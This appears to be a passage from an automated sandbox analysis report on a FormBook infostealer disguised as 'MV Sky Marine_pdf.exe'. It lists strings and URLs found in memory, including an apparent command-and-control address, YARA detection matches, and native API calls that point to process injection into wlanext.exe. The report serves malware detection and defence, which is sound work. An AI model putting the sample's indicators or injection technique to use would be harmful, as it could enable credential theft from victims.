          Source: explorer.exe, 00000004.00000000.256954284.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: explorer.exe, 00000004.00000000.256954284.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 00000004.00000000.256954284.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 00000004.00000000.256954284.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 00000004.00000000.256954284.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 00000004.00000000.256954284.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 00000004.00000000.256954284.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 00000004.00000000.256954284.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: explorer.exe, 00000004.00000000.256954284.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 00000004.00000000.256954284.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 00000004.00000000.256954284.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000004.00000000.256954284.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 00000004.00000000.256954284.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 00000004.00000000.256954284.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 00000004.00000000.256954284.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000004.00000000.256954284.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 00000004.00000000.256954284.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000004.00000000.256954284.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000004.00000000.256954284.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: wlanext.exe, 00000008.00000002.499864155.00000000039E2000.00000004.00000001.sdmpString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/html5shiv/3.7.3/html5shiv.js
          Source: wlanext.exe, 00000008.00000002.499864155.00000000039E2000.00000004.00000001.sdmpString found in binary or memory: https://fornex.com/
          Source: wlanext.exe, 00000008.00000002.499864155.00000000039E2000.00000004.00000001.sdmpString found in binary or memory: https://fornex.com/antiddos/
          Source: wlanext.exe, 00000008.00000002.499864155.00000000039E2000.00000004.00000001.sdmpString found in binary or memory: https://fornex.com/backup/
          Source: wlanext.exe, 00000008.00000002.499864155.00000000039E2000.00000004.00000001.sdmpString found in binary or memory: https://fornex.com/dedicated/
          Source: wlanext.exe, 00000008.00000002.499864155.00000000039E2000.00000004.00000001.sdmpString found in binary or memory: https://fornex.com/help/cpanel-first-steps/
          Source: wlanext.exe, 00000008.00000002.499864155.00000000039E2000.00000004.00000001.sdmpString found in binary or memory: https://fornex.com/help/faq/
          Source: wlanext.exe, 00000008.00000002.499864155.00000000039E2000.00000004.00000001.sdmpString found in binary or memory: https://fornex.com/help/transfer-site/
          Source: wlanext.exe, 00000008.00000002.499864155.00000000039E2000.00000004.00000001.sdmpString found in binary or memory: https://fornex.com/my/tickets/
          Source: wlanext.exe, 00000008.00000002.499864155.00000000039E2000.00000004.00000001.sdmpString found in binary or memory: https://fornex.com/ssd-hosting/
          Source: wlanext.exe, 00000008.00000002.499864155.00000000039E2000.00000004.00000001.sdmpString found in binary or memory: https://fornex.com/ssd-vps/
          Source: wlanext.exe, 00000008.00000002.499864155.00000000039E2000.00000004.00000001.sdmpString found in binary or memory: https://fornex.com/vpn/
          Source: wlanext.exe, 00000008.00000002.499864155.00000000039E2000.00000004.00000001.sdmpString found in binary or memory: https://hostnl03.fornex.host/404/css/base.css
          Source: wlanext.exe, 00000008.00000002.499864155.00000000039E2000.00000004.00000001.sdmpString found in binary or memory: https://hostnl03.fornex.host/404/img/favicon/apple-touch-icon-114x114.png
          Source: wlanext.exe, 00000008.00000002.499864155.00000000039E2000.00000004.00000001.sdmpString found in binary or memory: https://hostnl03.fornex.host/404/img/favicon/apple-touch-icon-120x120.png
          Source: wlanext.exe, 00000008.00000002.499864155.00000000039E2000.00000004.00000001.sdmpString found in binary or memory: https://hostnl03.fornex.host/404/img/favicon/apple-touch-icon-144x144.png
          Source: wlanext.exe, 00000008.00000002.499864155.00000000039E2000.00000004.00000001.sdmpString found in binary or memory: https://hostnl03.fornex.host/404/img/favicon/apple-touch-icon-152x152.png
          Source: wlanext.exe, 00000008.00000002.499864155.00000000039E2000.00000004.00000001.sdmpString found in binary or memory: https://hostnl03.fornex.host/404/img/favicon/apple-touch-icon-57x57.png
          Source: wlanext.exe, 00000008.00000002.499864155.00000000039E2000.00000004.00000001.sdmpString found in binary or memory: https://hostnl03.fornex.host/404/img/favicon/apple-touch-icon-60x60.png
          Source: wlanext.exe, 00000008.00000002.499864155.00000000039E2000.00000004.00000001.sdmpString found in binary or memory: https://hostnl03.fornex.host/404/img/favicon/apple-touch-icon-72x72.png
          Source: wlanext.exe, 00000008.00000002.499864155.00000000039E2000.00000004.00000001.sdmpString found in binary or memory: https://hostnl03.fornex.host/404/img/favicon/apple-touch-icon-76x76.png
          Source: wlanext.exe, 00000008.00000002.499864155.00000000039E2000.00000004.00000001.sdmpString found in binary or memory: https://hostnl03.fornex.host/404/img/favicon/favicon-128.png
          Source: wlanext.exe, 00000008.00000002.499864155.00000000039E2000.00000004.00000001.sdmpString found in binary or memory: https://hostnl03.fornex.host/404/img/favicon/favicon-16x16.png
          Source: wlanext.exe, 00000008.00000002.499864155.00000000039E2000.00000004.00000001.sdmpString found in binary or memory: https://hostnl03.fornex.host/404/img/favicon/favicon-196x196.png
          Source: wlanext.exe, 00000008.00000002.499864155.00000000039E2000.00000004.00000001.sdmpString found in binary or memory: https://hostnl03.fornex.host/404/img/favicon/favicon-32x32.png
          Source: wlanext.exe, 00000008.00000002.499864155.00000000039E2000.00000004.00000001.sdmpString found in binary or memory: https://hostnl03.fornex.host/404/img/favicon/favicon-96x96.png
          Source: wlanext.exe, 00000008.00000002.499864155.00000000039E2000.00000004.00000001.sdmpString found in binary or memory: https://hostnl03.fornex.host/404/img/favicon/mstile-144x144.png
          Source: wlanext.exe, 00000008.00000002.499864155.00000000039E2000.00000004.00000001.sdmpString found in binary or memory: https://hostnl03.fornex.host/404/img/favicon/mstile-150x150.png
          Source: wlanext.exe, 00000008.00000002.499864155.00000000039E2000.00000004.00000001.sdmpString found in binary or memory: https://hostnl03.fornex.host/404/img/favicon/mstile-310x150.png
          Source: wlanext.exe, 00000008.00000002.499864155.00000000039E2000.00000004.00000001.sdmpString found in binary or memory: https://hostnl03.fornex.host/404/img/favicon/mstile-310x310.png
          Source: wlanext.exe, 00000008.00000002.499864155.00000000039E2000.00000004.00000001.sdmpString found in binary or memory: https://hostnl03.fornex.host/404/img/favicon/mstile-70x70.png
          Source: wlanext.exe, 00000008.00000002.499864155.00000000039E2000.00000004.00000001.sdmpString found in binary or memory: https://hostnl03.fornex.host/404/img/icons/search.png
          Source: wlanext.exe, 00000008.00000002.499864155.00000000039E2000.00000004.00000001.sdmpString found in binary or memory: https://hostnl03.fornex.host/404/img/logo
          Source: wlanext.exe, 00000008.00000002.499864155.00000000039E2000.00000004.00000001.sdmpString found in binary or memory: https://hostnl03.fornex.host/404/img/logo-dark
          Source: wlanext.exe, 00000008.00000002.499864155.00000000039E2000.00000004.00000001.sdmpString found in binary or memory: https://hostnl03.fornex.host/404/img/logo-dark.png
          Source: wlanext.exe, 00000008.00000002.499864155.00000000039E2000.00000004.00000001.sdmpString found in binary or memory: https://hostnl03.fornex.host/404/img/logo.png
          Source: wlanext.exe, 00000008.00000002.499864155.00000000039E2000.00000004.00000001.sdmpString found in binary or memory: https://hostnl03.fornex.host/404/img/prlx-bg-main.png
          Source: wlanext.exe, 00000008.00000002.499864155.00000000039E2000.00000004.00000001.sdmpString found in binary or memory: https://www.michaelroberts.gallery/m2be/?t8r=3hs/fdpsiUpFetMliLQ5KTd9k1PXkNk579eBvZhq6Qtrn5Lx9iP8uWK
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeCode function: 2_2_0040514E GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,2_2_0040514E

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000008.00000002.495447504.0000000000A90000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.275644751.00000000009E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000001.233988024.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.275618923.00000000009A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.496617029.0000000000F50000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.496712195.0000000000F80000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.235033668.0000000002670000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.275453010.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 3.1.MV Sky Marine_pdf.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.1.MV Sky Marine_pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.MV Sky Marine_pdf.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.MV Sky Marine_pdf.exe.2670000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.MV Sky Marine_pdf.exe.2670000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.MV Sky Marine_pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000008.00000002.495447504.0000000000A90000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.495447504.0000000000A90000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.275644751.00000000009E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.275644751.00000000009E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000001.233988024.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000001.233988024.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.275618923.00000000009A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.275618923.00000000009A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000002.496617029.0000000000F50000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.496617029.0000000000F50000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000002.496712195.0000000000F80000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.496712195.0000000000F80000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.235033668.0000000002670000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.235033668.0000000002670000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.275453010.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.275453010.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.1.MV Sky Marine_pdf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.1.MV Sky Marine_pdf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.1.MV Sky Marine_pdf.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.1.MV Sky Marine_pdf.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.2.MV Sky Marine_pdf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.MV Sky Marine_pdf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.MV Sky Marine_pdf.exe.2670000.2.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.MV Sky Marine_pdf.exe.2670000.2.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.MV Sky Marine_pdf.exe.2670000.2.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.MV Sky Marine_pdf.exe.2670000.2.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.2.MV Sky Marine_pdf.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.MV Sky Marine_pdf.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Initial sample is a PE file and has a suspicious nameShow sources
          Source: initial sampleStatic PE information: Filename: MV Sky Marine_pdf.exe
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeCode function: 3_2_004181B0 NtCreateFile,3_2_004181B0
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeCode function: 3_2_00418260 NtReadFile,3_2_00418260
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeCode function: 3_2_004182E0 NtClose,3_2_004182E0
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeCode function: 3_2_00418390 NtAllocateVirtualMemory,3_2_00418390
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeCode function: 3_2_0041838D NtAllocateVirtualMemory,3_2_0041838D
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeCode function: 3_2_00AF98F0 NtReadVirtualMemory,LdrInitializeThunk,3_2_00AF98F0
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeCode function: 3_2_00AF9860 NtQuerySystemInformation,LdrInitializeThunk,3_2_00AF9860
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeCode function: 3_2_00AF9840 NtDelayExecution,LdrInitializeThunk,3_2_00AF9840
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeCode function: 3_2_00AF99A0 NtCreateSection,LdrInitializeThunk,3_2_00AF99A0
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeCode function: 3_2_00AF9910 NtAdjustPrivilegesToken,LdrInitializeThunk,3_2_00AF9910
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeCode function: 3_2_00AF9A20 NtResumeThread,LdrInitializeThunk,3_2_00AF9A20
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeCode function: 3_2_00AF9A00 NtProtectVirtualMemory,LdrInitializeThunk,3_2_00AF9A00
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeCode function: 3_2_00AF9A50 NtCreateFile,LdrInitializeThunk,3_2_00AF9A50
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeCode function: 3_2_00AF95D0 NtClose,LdrInitializeThunk,3_2_00AF95D0
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeCode function: 3_2_00AF9540 NtReadFile,LdrInitializeThunk,3_2_00AF9540
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeCode function: 3_2_00AF96E0 NtFreeVirtualMemory,LdrInitializeThunk,3_2_00AF96E0
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeCode function: 3_2_00AF9660 NtAllocateVirtualMemory,LdrInitializeThunk,3_2_00AF9660
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeCode function: 3_2_00AF97A0 NtUnmapViewOfSection,LdrInitializeThunk,3_2_00AF97A0
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeCode function: 3_2_00AF9780 NtMapViewOfSection,LdrInitializeThunk,3_2_00AF9780
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeCode function: 3_2_00AF9FE0 NtCreateMutant,LdrInitializeThunk,3_2_00AF9FE0
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeCode function: 3_2_00AF9710 NtQueryInformationToken,LdrInitializeThunk,3_2_00AF9710
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeCode function: 3_2_00AF98A0 NtWriteVirtualMemory,3_2_00AF98A0
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeCode function: 3_2_00AF9820 NtEnumerateKey,3_2_00AF9820
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeCode function: 3_2_00AFB040 NtSuspendThread,3_2_00AFB040
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeCode function: 3_2_00AF99D0 NtCreateProcessEx,3_2_00AF99D0
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeCode function: 3_2_00AF9950 NtQueueApcThread,3_2_00AF9950
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeCode function: 3_2_00AF9A80 NtOpenDirectoryObject,3_2_00AF9A80
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeCode function: 3_2_00AF9A10 NtQuerySection,3_2_00AF9A10
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeCode function: 3_2_00AFA3B0 NtGetContextThread,3_2_00AFA3B0
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeCode function: 3_2_00AF9B00 NtSetValueKey,3_2_00AF9B00
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeCode function: 3_2_00AF95F0 NtQueryInformationFile,3_2_00AF95F0
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeCode function: 3_2_00AF9520 NtWaitForSingleObject,3_2_00AF9520
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeCode function: 3_2_00AFAD30 NtSetContextThread,3_2_00AFAD30
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeCode function: 3_2_00AF9560 NtWriteFile,3_2_00AF9560
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeCode function: 3_2_00AF96D0 NtCreateKey,3_2_00AF96D0
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeCode function: 3_2_00AF9610 NtEnumerateValueKey,3_2_00AF9610
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeCode function: 3_2_00AF9670 NtQueryInformationProcess,3_2_00AF9670
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeCode function: 3_2_00AF9650 NtQueryValueKey,3_2_00AF9650
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeCode function: 3_2_00AF9730 NtQueryVirtualMemory,3_2_00AF9730
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeCode function: 3_2_00AFA710 NtOpenProcessToken,3_2_00AFA710
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeCode function: 3_2_00AF9760 NtOpenProcess,3_2_00AF9760
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeCode function: 3_2_00AF9770 NtSetInformationFile,3_2_00AF9770
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeCode function: 3_2_00AFA770 NtOpenThread,3_2_00AFA770
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeCode function: 3_1_004181B0 NtCreateFile,3_1_004181B0
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeCode function: 3_1_00418260 NtReadFile,3_1_00418260
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeCode function: 3_1_004182E0 NtClose,3_1_004182E0
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeCode function: 3_1_00418390 NtAllocateVirtualMemory,3_1_00418390
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeCode function: 3_1_0041838D NtAllocateVirtualMemory,3_1_0041838D
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03399710 NtQueryInformationToken,LdrInitializeThunk,8_2_03399710
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03399780 NtMapViewOfSection,LdrInitializeThunk,8_2_03399780
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03399FE0 NtCreateMutant,LdrInitializeThunk,8_2_03399FE0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03399660 NtAllocateVirtualMemory,LdrInitializeThunk,8_2_03399660
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03399A50 NtCreateFile,LdrInitializeThunk,8_2_03399A50
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03399650 NtQueryValueKey,LdrInitializeThunk,8_2_03399650
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_033996E0 NtFreeVirtualMemory,LdrInitializeThunk,8_2_033996E0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_033996D0 NtCreateKey,LdrInitializeThunk,8_2_033996D0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03399910 NtAdjustPrivilegesToken,LdrInitializeThunk,8_2_03399910
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03399540 NtReadFile,LdrInitializeThunk,8_2_03399540
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_033999A0 NtCreateSection,LdrInitializeThunk,8_2_033999A0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_033995D0 NtClose,LdrInitializeThunk,8_2_033995D0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03399860 NtQuerySystemInformation,LdrInitializeThunk,8_2_03399860
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03399840 NtDelayExecution,LdrInitializeThunk,8_2_03399840
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03399730 NtQueryVirtualMemory,8_2_03399730
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0339A710 NtOpenProcessToken,8_2_0339A710
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03399B00 NtSetValueKey,8_2_03399B00
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03399770 NtSetInformationFile,8_2_03399770
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0339A770 NtOpenThread,8_2_0339A770
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03399760 NtOpenProcess,8_2_03399760
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0339A3B0 NtGetContextThread,8_2_0339A3B0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_033997A0 NtUnmapViewOfSection,8_2_033997A0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03399A20 NtResumeThread,8_2_03399A20
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03399610 NtEnumerateValueKey,8_2_03399610
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03399A10 NtQuerySection,8_2_03399A10
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03399A00 NtProtectVirtualMemory,8_2_03399A00
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03399670 NtQueryInformationProcess,8_2_03399670
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03399A80 NtOpenDirectoryObject,8_2_03399A80
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0339AD30 NtSetContextThread,8_2_0339AD30
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03399520 NtWaitForSingleObject,8_2_03399520
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03399560 NtWriteFile,8_2_03399560
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03399950 NtQueueApcThread,8_2_03399950
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_033995F0 NtQueryInformationFile,8_2_033995F0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_033999D0 NtCreateProcessEx,8_2_033999D0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03399820 NtEnumerateKey,8_2_03399820
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0339B040 NtSuspendThread,8_2_0339B040
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_033998A0 NtWriteVirtualMemory,8_2_033998A0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_033998F0 NtReadVirtualMemory,8_2_033998F0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_00AA81B0 NtCreateFile,8_2_00AA81B0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_00AA82E0 NtClose,8_2_00AA82E0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_00AA8260 NtReadFile,8_2_00AA8260
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_00AA8390 NtAllocateVirtualMemory,8_2_00AA8390
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_00AA838D NtAllocateVirtualMemory,8_2_00AA838D
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeCode function: 2_2_0040326F EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,2_2_0040326F
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeCode function: 2_2_0040495F2_2_0040495F
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeCode function: 3_2_004010303_2_00401030
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeCode function: 3_2_0041C24C3_2_0041C24C
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeCode function: 3_2_0041CB403_2_0041CB40
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeCode function: 3_2_00408C4C3_2_00408C4C
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeCode function: 3_2_00408C503_2_00408C50
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeCode function: 3_2_0041C4AE3_2_0041C4AE
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeCode function: 3_2_00402D903_2_00402D90
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeCode function: 3_2_0041B7783_2_0041B778
